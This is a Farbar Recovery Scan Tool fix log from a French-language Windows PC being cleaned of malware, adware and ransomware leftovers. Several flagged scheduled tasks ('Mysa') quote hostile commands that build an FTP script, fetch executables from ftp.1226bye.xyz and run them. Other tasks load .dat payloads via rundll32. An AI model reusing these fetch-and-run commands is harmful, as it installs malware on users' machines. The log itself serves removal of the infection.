Fix result of Farbar Recovery Scan Tool (x64) Version: 10.02.2019 01 Ran by SYSTEM (12-02-2019 21:06:27) Run:3 Running from G:\ Boot Mode: Recovery ============================================== fixlist content: ***************** CreateRestorePoint: CloseProcesses: HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [start] => C:\Windows\SysWOW64\scrobj.dll [173568 2009-07-14] (Microsoft Windows -> Microsoft Corporation) <==== ATTENTION HKLM-x32\...\RunOnce: [!BingBar] => "C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0oemBingBarSetup-Partner.EXE" /C:"BBSetup.exe cabLocation=.\BingBarPartnerConfig.cab ui=false ismu=2" HKLM-x32\...\RunOnce: [wextract_cleanup0] => rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\seb\AppData\Local\Temp\IXP000.TMP\" <==== ATTENTION C:\Users\seb\AppData\Local\Temp\IXP000.TMP HKU\S-1-5-21-538220665-914173731-789976379-1000\...\Run: [SMSetup] => "C:\Users\seb\AppData\Local\Temp\B5A4728A-4F02-497E-A47F-8F32BF943E7C\SMSetup.exe" /cnid 926458 /fpd /dsie /dsff /dsgc /hp /wait /ntp_ie /ms /restart <==== ATTENTION C:\Users\seb\AppData\Local\Temp\B5A4728A-4F02-497E-A47F-8F32BF943E7C\SMSetup.exe HKU\S-1-5-18\...\RunOnce: [SpUninstallDeleteDir] => rmdir /s /q "\SearchProtect" SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL = hxxp://rover.ebay.com/rover/1/709-111075-12437-0/4?satitle={searchTerms}&mfe=Desktops SearchScopes: HKLM-x32 -> DefaultScope la valeur est absente SearchScopes: HKLM-x32 -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL = hxxp://rover.ebay.com/rover/1/709-111075-12437-0/4?satitle={searchTerms}&mfe=Desktops FF HKLM-x32\...\Thunderbird\Extensions: [avgthb@avg.com] - C:\Program Files (x86)\AVG\AVG2012\Thunderbird => non trouvé(e) FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Pas de fichier] FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files 
(x86)\VideoLAN\VLC\npvlc.dll [Pas de fichier] C:\Program Files (x86)\AVG CHR NewTab: Default -> Active:"chrome-extension://ejocekekgcaldnmjngfdbmbeebcekelc/newtab.html" CHR HKU\S-1-5-21-538220665-914173731-789976379-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ejocekekgcaldnmjngfdbmbeebcekelc] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [ejocekekgcaldnmjngfdbmbeebcekelc] - hxxps://clients2.google.com/service/update2/crx CHR HKLM\...\Chrome\Extension: [ejocekekgcaldnmjngfdbmbeebcekelc] - hxxps://clients2.google.com/service/update2/crx CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx 2019-02-11 09:32 - 2019-02-11 09:32 - 000003518 _____ C:\Windows\System32\Tasks\Mysa 2019-02-11 09:32 - 2019-02-11 09:32 - 000003504 _____ C:\Windows\System32\Tasks\Mysa3 2019-02-11 09:32 - 2019-02-11 09:32 - 000003424 _____ C:\Windows\System32\Tasks\Mysa2 2019-02-11 09:32 - 2019-02-11 09:32 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1 C:\Users\seb\Desktop\wovhdyxirnjwh.txt 2018-12-20 10:10 - 2018-12-20 10:10 - 002685544 _____ (BitTorrent Inc.) C:\Program Files\BitTorrent.exe 2019-02-02 11:42 - 2015-11-13 18:24 - 000000000 ____D C:\Users\seb\AppData\Roaming\BitTorrent 2018-12-22 10:49 - 2018-12-22 10:49 - 007548656 _____ (AVG Technologies CZ, s.r.o.) C:\Program Files\avg_antivirus_free_setup_a2l.exe 2018-12-20 10:10 - 2018-12-20 10:10 - 002685544 _____ (BitTorrent Inc.) 
C:\Program Files\BitTorrent.exe C:\Program Files (x86)\hijackthis_hijackthis_2.0.4_anglais_17891.msi 2015-09-09 17:33 - 2015-09-09 17:33 - 000009130 _____ () C:\Users\seb\AppData\Roaming\HELP_DECRYPT.HTML 2015-09-09 17:33 - 2015-09-09 17:33 - 000047841 _____ () C:\Users\seb\AppData\Roaming\HELP_DECRYPT.PNG 2015-09-09 17:33 - 2015-09-09 17:33 - 000004756 _____ () C:\Users\seb\AppData\Roaming\HELP_DECRYPT.TXT 2015-09-09 17:33 - 2015-09-09 17:33 - 000000300 _____ () C:\Users\seb\AppData\Roaming\HELP_DECRYPT.URL 2015-09-09 17:33 - 2015-09-09 17:33 - 000009130 _____ () C:\Users\seb\AppData\Roaming\Microsoft\HELP_DECRYPT.HTML 2015-09-09 17:33 - 2015-09-09 17:33 - 000047841 _____ () C:\Users\seb\AppData\Roaming\Microsoft\HELP_DECRYPT.PNG 2015-09-09 17:33 - 2015-09-09 17:33 - 000004756 _____ () C:\Users\seb\AppData\Roaming\Microsoft\HELP_DECRYPT.TXT 2015-09-09 17:33 - 2015-09-09 17:33 - 000000300 _____ () C:\Users\seb\AppData\Roaming\Microsoft\HELP_DECRYPT.URL 2015-09-09 17:33 - 2015-09-09 17:33 - 000009130 _____ () C:\Users\seb\AppData\Local\HELP_DECRYPT.HTML 2015-09-09 17:33 - 2015-09-09 17:33 - 000047841 _____ () C:\Users\seb\AppData\Local\HELP_DECRYPT.PNG 2015-09-09 17:33 - 2015-09-09 17:33 - 000004756 _____ () C:\Users\seb\AppData\Local\HELP_DECRYPT.TXT 2015-09-09 17:33 - 2015-09-09 17:33 - 000000300 _____ () C:\Users\seb\AppData\Local\HELP_DECRYPT.URL 2018-09-22 07:01 - 2018-09-22 07:01 - 000000000 _____ () C:\Users\seb\AppData\Local\{072E71B2-1E8B-4E8A-BF64-AD2534DB2A20} 2018-09-22 07:01 - 2018-09-22 07:01 - 000000000 _____ () C:\Users\seb\AppData\Local\{0C47508B-2ED0-44C2-A325-F3BC8CA08178} 2019-02-05 19:12 - 2019-02-05 19:12 - 000000000 _____ () C:\Users\seb\AppData\Local\{3CB706B5-36BB-4036-B7F1-872CE9B59BE8} 2019-02-05 19:12 - 2019-02-05 19:12 - 000000000 _____ () C:\Users\seb\AppData\Local\{3D0A3C2D-6388-4E53-9EE0-E1215AF28AF0} C:\Windows\SysWOW64\scrobj.dll 2019-02-08 18:48 - 2014-03-12 09:26 - 010168896 _____ (Foxit Corporation) 
C:\Users\seb\AppData\Local\Temp\Foxit Reader Updater.exe Task: {08166AD7-BC80-4E8A-B3CE-3FB38D87E667} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION Task: {5080C933-E97E-44E2-A412-7272318EEC7F} - System32\Tasks\ROC_REG_JAN_DELETE => C:\ProgramData\AVG January 2013 Campaign\ROC.exe (AVG Technologies -> ) Task: {6C997686-58F9-4B03-BE3D-3339C1A0E575} - System32\Tasks\Mysa3 => cmd /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION Task: {9AC69DB8-8F01-4610-AA8F-6ACA64D8F283} - System32\Tasks\Mysa => cmd /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION Task: {C6AA86B5-3B75-422F-B62E-B4895E28B2B1} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa Task: {E0385589-8F38-4542-8B0A-8B1200B16292} - System32\Tasks\Mysa2 => cmd /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION Task: {ECFA415A-0101-4341-BFC8-6F10A12D27D3} - \{B0782209-B4AC-4BDA-A6B6-04641A0F5499} -> Pas de fichier <==== ATTENTION Task: {F35FC867-404F-448A-AE07-D19A90638CA7} - System32\Tasks\Microsoft\Windows\MemDiag => C:\Windows\system32\mdres.exe (Microsoft Windows -> Microsoft Corporation) Task: C:\Windows\Tasks\ROC_REG_JAN_DELETE.job => C:\ProgramData\AVG January 2013 Campaign\ROC.exe c:\windows\debug\item.dat C:\ProgramData\AVG January 2013 Campaign c:\windows\help\lsmosee.exe c:\windows\update.exe c:\windows\debug\item.dat c:\windows\debug\ok.dat C:\users\seb\appdata\roaming\bittorrent MSCONFIG\Services: PDF Architect Helper Service => 2 MSCONFIG\Services: PDF Architect Service => 2 FirewallRules: [TCP Query User{A878CE2A-4866-4ADF-B0FC-C9E3A95F9A54}C:\users\seb\appdata\roaming\bittorrent\bittorrent.exe] 
=> (Block) C:\users\seb\appdata\roaming\bittorrent\bittorrent.exe Pas de fichier FirewallRules: [UDP Query User{80A01F73-46DE-4BD1-BFDB-F4ACC5486581}C:\users\seb\appdata\roaming\bittorrent\bittorrent.exe] => (Block) C:\users\seb\appdata\roaming\bittorrent\bittorrent.exe Pas de fichier FirewallRules: [TCP Query User{09C90D83-1B72-4418-A128-955D4F5FC2C4}C:\users\seb\bittorrent_7-9-2-build-37251_fr_11039.exe] => (Block) C:\users\seb\bittorrent_7-9-2-build-37251_fr_11039.exe Pas de fichier FirewallRules: [UDP Query User{56468598-4CDA-4B06-883B-F462DCF4DF83}C:\users\seb\bittorrent_7-9-2-build-37251_fr_11039.exe] => (Block) C:\users\seb\bittorrent_7-9-2-build-37251_fr_11039.exe Pas de fichier FirewallRules: [TCP Query User{23A13744-E4CC-47A1-9C0B-3545FFB4CE07}C:\users\seb\appdata\roaming\bittorrent\bittorrent.exe] => (Block) C:\users\seb\appdata\roaming\bittorrent\bittorrent.exe Pas de fichier FirewallRules: [UDP Query User{E12A5554-9B15-4C5F-8DA6-4430F068D0FA}C:\users\seb\appdata\roaming\bittorrent\bittorrent.exe] => (Block) C:\users\seb\appdata\roaming\bittorrent\bittorrent.exe Pas de fichier FirewallRules: [TCP Query User{6EF3DEC1-D583-4B2B-9D57-44CFD06D6E1B}C:\users\seb\appdata\roaming\bittorrent\updates\7.9.2_38914.exe] => (Block) C:\users\seb\appdata\roaming\bittorrent\updates\7.9.2_38914.exe Pas de fichier FirewallRules: [UDP Query User{565BA3D9-7E02-4835-BA1D-3F0D263EE900}C:\users\seb\appdata\roaming\bittorrent\updates\7.9.2_38914.exe] => (Block) C:\users\seb\appdata\roaming\bittorrent\updates\7.9.2_38914.exe Pas de fichier FirewallRules: [{F53DE6EF-5FA3-44E7-8847-15DF55AD9389}] => (Allow) C:\Users\seb\AppData\Roaming\uTorrent\uTorrent.exe Pas de fichier FirewallRules: [{EAB85AF4-1D06-4A3F-A9E8-D51D8174F170}] => (Allow) C:\Users\seb\AppData\Roaming\uTorrent\uTorrent.exe Pas de fichier FirewallRules: [TCP Query User{E65E1F8A-3A59-4B91-BBCD-96C35F746B00}C:\program files\dvdfab 11\dvdfab64.exe] => (Allow) C:\program files\dvdfab 11\dvdfab64.exe Pas de fichier 
FirewallRules: [UDP Query User{AFF844F2-60BD-4476-98D6-383EA160A70E}C:\program files\dvdfab 11\dvdfab64.exe] => (Allow) C:\program files\dvdfab 11\dvdfab64.exe Pas de fichier Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\AVG PC Tuneup 2011 on the Web.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\boostspeed.url (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\AVG PC Tuneup 2011.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\BoostSpeed.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\AVG Rescue Center.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\RescueCenter.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Console Defragmentation.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Disk Defrag.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\DiskDefrag.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Disk Doctor.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\DiskDoctor.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Disk Wiper.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\DiskWiper.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Duplicate File Finder.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\DuplicateFileFinder.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG File Recovery.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\FileRecovery.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 
2011\Utilities\AVG File Shredder.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\FileShredder.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Internet Optimizer.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\InternetOptimizer.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Registry Defrag.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\RegistryDefrag.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Rescue Center.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\RescueCenter.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Service Manager.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\ServiceManager.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Startup Manager.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\StartupManager.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG System Information.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\SystemInformation.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Task Manager.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\TaskManager.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Track Eraser.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\TrackEraser.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Tweak Manager.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\TweakManager.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 
2011\Utilities\AVG Uninstall Manager.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\ProgramManager.exe (Pas de fichier) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011 C:\Program Files (x86)\AVG\AVG PC Tuneup 2011 Reg: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction" /V Enable /T REG_SZ /D n /f Reg: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction" /V OptimizeComplete /T REG_SZ /D no /f Reg: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V PowerdownAfterShutdown /T REG_SZ /D 1 /f Reg: REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /V ClearPageFileAtShutdown /T REG_DWORD /D 0 /f Reg: REG ADD "HKEY_CURRENT_USER\Control Panel\Desktop" /V MenuShowDelay /T REG_SZ /D 400 /f Reg: REG ADD "HKEY_CURRENT_USER\Control Panel\Desktop" /V WaitToKillAppTimeout /T REG_SZ /D 1200 /f Reg: REG ADD "HKEY_CURRENT_USER\Control Panel\Desktop" /V HungAppTimeout /T REG_SZ /D 1200 /f Reg: REG ADD "HKEY_CURRENT_USER\Control Panel\Desktop" /V AutoEndTasks /T REG_SZ /D 1 /f Reg: REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control" /V WaitToKillServiceTimeout /T REG_SZ /D 1200 /f Reg: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /V EnableLUA /T REG_DWORD /D 1 /f cmd: bitsadmin /reset cmd: netsh winsock reset cmd: ipconfig /flushdns EmptyTemp: ***************** Error: Restore point can only be created in normal mode. CloseProcesses: => Error: This directive works only outside recovery mode. 
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\" => removed successfully "HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\start" => removed successfully "HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\\!BingBar" => removed successfully "HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\\wextract_cleanup0" => removed successfully C:\Users\seb\AppData\Local\Temp\IXP000.TMP => moved successfully "HKU\S-1-5-21-538220665-914173731-789976379-1000\Software\Microsoft\Windows\CurrentVersion\Run\\SMSetup" => not found "C:\Users\seb\AppData\Local\Temp\B5A4728A-4F02-497E-A47F-8F32BF943E7C\SMSetup.exe" => not found "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce\\SpUninstallDeleteDir" => not found SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = => Error: The entry should be fixed outside recovery mode. SearchScopes: HKLM -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL = hxxp://rover.ebay.com/rover/1/709-111075-12437-0/4?satitle={searchTerms}&mfe=Desktops => Error: The entry should be fixed outside recovery mode. SearchScopes: HKLM-x32 -> DefaultScope la valeur est absente => Error: The entry should be fixed outside recovery mode. SearchScopes: HKLM-x32 -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL = hxxp://rover.ebay.com/rover/1/709-111075-12437-0/4?satitle={searchTerms}&mfe=Desktops => Error: The entry should be fixed outside recovery mode. FF HKLM-x32\...\Thunderbird\Extensions: [avgthb@avg.com] - C:\Program Files (x86)\AVG\AVG2012\Thunderbird => non trouvé(e) => Error: The entry should be fixed outside recovery mode. FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Pas de fichier] => Error: The entry should be fixed outside recovery mode. FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Pas de fichier] => Error: The entry should be fixed outside recovery mode. 
"C:\Program Files (x86)\AVG" => not found CHR NewTab: Default -> Active:"chrome-extension://ejocekekgcaldnmjngfdbmbeebcekelc/newtab.html" => Error: The entry should be fixed outside recovery mode. CHR HKU\S-1-5-21-538220665-914173731-789976379-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ejocekekgcaldnmjngfdbmbeebcekelc] - hxxps://clients2.google.com/service/update2/crx => Error: The entry should be fixed outside recovery mode. CHR HKLM-x32\...\Chrome\Extension: [ejocekekgcaldnmjngfdbmbeebcekelc] - hxxps://clients2.google.com/service/update2/crx => Error: The entry should be fixed outside recovery mode. CHR HKLM\...\Chrome\Extension: [ejocekekgcaldnmjngfdbmbeebcekelc] - hxxps://clients2.google.com/service/update2/crx => Error: The entry should be fixed outside recovery mode. CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx => Error: The entry should be fixed outside recovery mode. CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx => Error: The entry should be fixed outside recovery mode. 
C:\Windows\System32\Tasks\Mysa => moved successfully C:\Windows\System32\Tasks\Mysa3 => moved successfully C:\Windows\System32\Tasks\Mysa2 => moved successfully C:\Windows\System32\Tasks\Mysa1 => moved successfully C:\Users\seb\Desktop\wovhdyxirnjwh.txt => moved successfully C:\Program Files\BitTorrent.exe => moved successfully C:\Users\seb\AppData\Roaming\BitTorrent => moved successfully C:\Program Files\avg_antivirus_free_setup_a2l.exe => moved successfully "C:\Program Files\BitTorrent.exe" => not found C:\Program Files (x86)\hijackthis_hijackthis_2.0.4_anglais_17891.msi => moved successfully C:\Users\seb\AppData\Roaming\HELP_DECRYPT.HTML => moved successfully C:\Users\seb\AppData\Roaming\HELP_DECRYPT.PNG => moved successfully C:\Users\seb\AppData\Roaming\HELP_DECRYPT.TXT => moved successfully C:\Users\seb\AppData\Roaming\HELP_DECRYPT.URL => moved successfully C:\Users\seb\AppData\Roaming\Microsoft\HELP_DECRYPT.HTML => moved successfully C:\Users\seb\AppData\Roaming\Microsoft\HELP_DECRYPT.PNG => moved successfully C:\Users\seb\AppData\Roaming\Microsoft\HELP_DECRYPT.TXT => moved successfully C:\Users\seb\AppData\Roaming\Microsoft\HELP_DECRYPT.URL => moved successfully C:\Users\seb\AppData\Local\HELP_DECRYPT.HTML => moved successfully C:\Users\seb\AppData\Local\HELP_DECRYPT.PNG => moved successfully C:\Users\seb\AppData\Local\HELP_DECRYPT.TXT => moved successfully C:\Users\seb\AppData\Local\HELP_DECRYPT.URL => moved successfully C:\Users\seb\AppData\Local\{072E71B2-1E8B-4E8A-BF64-AD2534DB2A20} => moved successfully C:\Users\seb\AppData\Local\{0C47508B-2ED0-44C2-A325-F3BC8CA08178} => moved successfully C:\Users\seb\AppData\Local\{3CB706B5-36BB-4036-B7F1-872CE9B59BE8} => moved successfully C:\Users\seb\AppData\Local\{3D0A3C2D-6388-4E53-9EE0-E1215AF28AF0} => moved successfully C:\Windows\SysWOW64\scrobj.dll => moved successfully C:\Users\seb\AppData\Local\Temp\Foxit Reader Updater.exe => moved successfully Task: {08166AD7-BC80-4E8A-B3CE-3FB38D87E667} - 
System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION => Error: The entry should be fixed outside recovery mode. Task: {5080C933-E97E-44E2-A412-7272318EEC7F} - System32\Tasks\ROC_REG_JAN_DELETE => C:\ProgramData\AVG January 2013 Campaign\ROC.exe (AVG Technologies -> ) => Error: The entry should be fixed outside recovery mode. Task: {6C997686-58F9-4B03-BE3D-3339C1A0E575} - System32\Tasks\Mysa3 => cmd /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION => Error: The entry should be fixed outside recovery mode. Task: {9AC69DB8-8F01-4610-AA8F-6ACA64D8F283} - System32\Tasks\Mysa => cmd /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION => Error: The entry should be fixed outside recovery mode. Task: {C6AA86B5-3B75-422F-B62E-B4895E28B2B1} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa => Error: The entry should be fixed outside recovery mode. Task: {E0385589-8F38-4542-8B0A-8B1200B16292} - System32\Tasks\Mysa2 => cmd /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION => Error: The entry should be fixed outside recovery mode. Task: {ECFA415A-0101-4341-BFC8-6F10A12D27D3} - \{B0782209-B4AC-4BDA-A6B6-04641A0F5499} -> Pas de fichier <==== ATTENTION => Error: The entry should be fixed outside recovery mode. Task: {F35FC867-404F-448A-AE07-D19A90638CA7} - System32\Tasks\Microsoft\Windows\MemDiag => C:\Windows\system32\mdres.exe (Microsoft Windows -> Microsoft Corporation) => Error: The entry should be fixed outside recovery mode. Task: C:\Windows\Tasks\ROC_REG_JAN_DELETE.job => C:\ProgramData\AVG January 2013 Campaign\ROC.exe => Error: The entry should be fixed outside recovery mode. 
c:\windows\debug\item.dat => moved successfully C:\ProgramData\AVG January 2013 Campaign => moved successfully "c:\windows\help\lsmosee.exe" => not found "c:\windows\update.exe" => not found "c:\windows\debug\item.dat" => not found "c:\windows\debug\ok.dat" => not found "C:\users\seb\appdata\roaming\bittorrent" => not found HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\Services\PDF Architect Helper Service => removed successfully "HKLM\System\CurrentControlSet\Services\PDF Architect Helper Service" => not found HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\Services\PDF Architect Service => removed successfully "HKLM\System\CurrentControlSet\Services\PDF Architect Service" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{A878CE2A-4866-4ADF-B0FC-C9E3A95F9A54}C:\users\seb\appdata\roaming\bittorrent\bittorrent.exe" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{80A01F73-46DE-4BD1-BFDB-F4ACC5486581}C:\users\seb\appdata\roaming\bittorrent\bittorrent.exe" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{09C90D83-1B72-4418-A128-955D4F5FC2C4}C:\users\seb\bittorrent_7-9-2-build-37251_fr_11039.exe" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{56468598-4CDA-4B06-883B-F462DCF4DF83}C:\users\seb\bittorrent_7-9-2-build-37251_fr_11039.exe" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{23A13744-E4CC-47A1-9C0B-3545FFB4CE07}C:\users\seb\appdata\roaming\bittorrent\bittorrent.exe" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{E12A5554-9B15-4C5F-8DA6-4430F068D0FA}C:\users\seb\appdata\roaming\bittorrent\bittorrent.exe" => not found 
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{6EF3DEC1-D583-4B2B-9D57-44CFD06D6E1B}C:\users\seb\appdata\roaming\bittorrent\updates\7.9.2_38914.exe" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{565BA3D9-7E02-4835-BA1D-3F0D263EE900}C:\users\seb\appdata\roaming\bittorrent\updates\7.9.2_38914.exe" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{F53DE6EF-5FA3-44E7-8847-15DF55AD9389}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{EAB85AF4-1D06-4A3F-A9E8-D51D8174F170}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{E65E1F8A-3A59-4B91-BBCD-96C35F746B00}C:\program files\dvdfab 11\dvdfab64.exe" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{AFF844F2-60BD-4476-98D6-383EA160A70E}C:\program files\dvdfab 11\dvdfab64.exe" => not found C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\AVG PC Tuneup 2011 on the Web.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\AVG PC Tuneup 2011.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\AVG Rescue Center.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Console Defragmentation.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Disk Defrag.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 